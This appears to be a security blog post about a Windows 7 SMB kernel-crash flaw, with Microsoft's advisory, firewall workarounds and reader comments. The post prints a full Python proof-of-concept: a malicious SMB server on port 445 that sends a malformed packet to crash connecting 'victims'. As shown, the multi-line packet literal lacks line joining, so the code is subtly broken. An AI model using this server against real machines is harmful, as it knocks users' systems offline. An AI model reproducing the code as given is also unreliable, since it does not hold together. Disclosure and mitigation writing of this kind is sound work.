Windows 7 SMB Kernel Crash Video

patch_tuesday

Back on November 11th, 2009 we confirmed Laurent Gaffié’s remote exploit for Windows that causes a kernel crash. The operating system actually freezes creating a denial of service when, for example, a user is tricked into clicking on a link on a web page to a malicious SMB share request. The SMB client goes into an infinite loop when processing this malformed request according to Microsoft. The video below demonstrates this effect, having a user click a web site link and showing the crash.

“We are not aware of any active attacks using the exploit code that was made public for this vulnerability”
Jerry Bryant, Microsoft

Microsoft discusses this problem under Security Advisory 977544. The Security Response Center (MSRC) blog announced last Thursday that it would not correct this bug in this month’s patch release. The MSFT advisory initially discusses ingress rules for firewalls (rules for requests coming from the Internet) under mitigating factors, which would not be helpful in the case of a user making the request by clicking a link. It then catches this though under ‘Workarounds’ by stating to “block all SMB communications to and from the Internet to help prevent attacks”, which is a correct approach.

Windows 7 SMB Crash Video

People seem to be having a hard time visualizing this attack. The video below demonstrates first the crash itself, and then simulates a user clicking a link to a malformed SMB request.

Test Code

Here is the Python code used for testing, based on Gaffie’s original post:

import SocketServer as a
packet = "\x00\x00\x00\x9a"
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class x(a.BaseRequestHandler):
  def handle(s):
      print "You connecting to me: %s"%(s.client_address[0])
      i = s.request.recv(1024)
      s.request.send(packet)
      s.request.close()
print "Waiting for the victim to connect to my open port 445"
launch = a.TCPServer(('', 445),x)
launch.serve_forever()

SMB

Server Message Block or SMB is an application-layer network protocol commonly used by Microsoft Windows to share files over the Local Area Network (LAN).

Finally

Many ISP’s will block requests associated with the SMB protocol for home broadband Internet connections in reaction to past remote threats that use the SMB port. For businesses, unless good egress rules are in place (many times they are not), this attack is a realistic threat. Good egress rules will block it, and should already be in place for other potential threats if not already there. This provides a good excuse to check.

Microsoft has yet to release a scheduled fix date for this. While not as problematic as say an exploit that allows for code injection, a remotely exploitable DOS attack that remains announced and in zero day status for more than two months likely does merit attention in February’s patch Tuesday release.

Filed Under: Remote Exploit

Tags: , , , ,

Comments (7)

Trackback URL | Comments RSS Feed

  1. Stuart says:

    So where do I get the free cheese balls from?

  2. Social comments and analytics for this post…

    This post was mentioned on Twitter by ThePraetorian: Windows SMB Crash Video – http://bit.ly/7r4bnF

  3. [...] Security. I don’t know anything about the company but I do enjoy the video they provided of the Windows 7 SMB Kernel Crash Video. The best part is that Microsoft still does not believe it needs a patch. This is the same [...]

  4. [...] Security. I don’t know anything about the company but I do enjoy the video they provided of the Windows 7 SMB Kernel Crash Video. The best part is that Microsoft still does not believe it needs a patch. This is the same [...]

  5. Bilal Malik says:

    I try to run this code in Python3.2 but I get several errors. Was anyone able to run this code?

  6. Bilal Malik says:

    The error I get is: An attempt was made to access a socket in a way forbidden by its access permissions.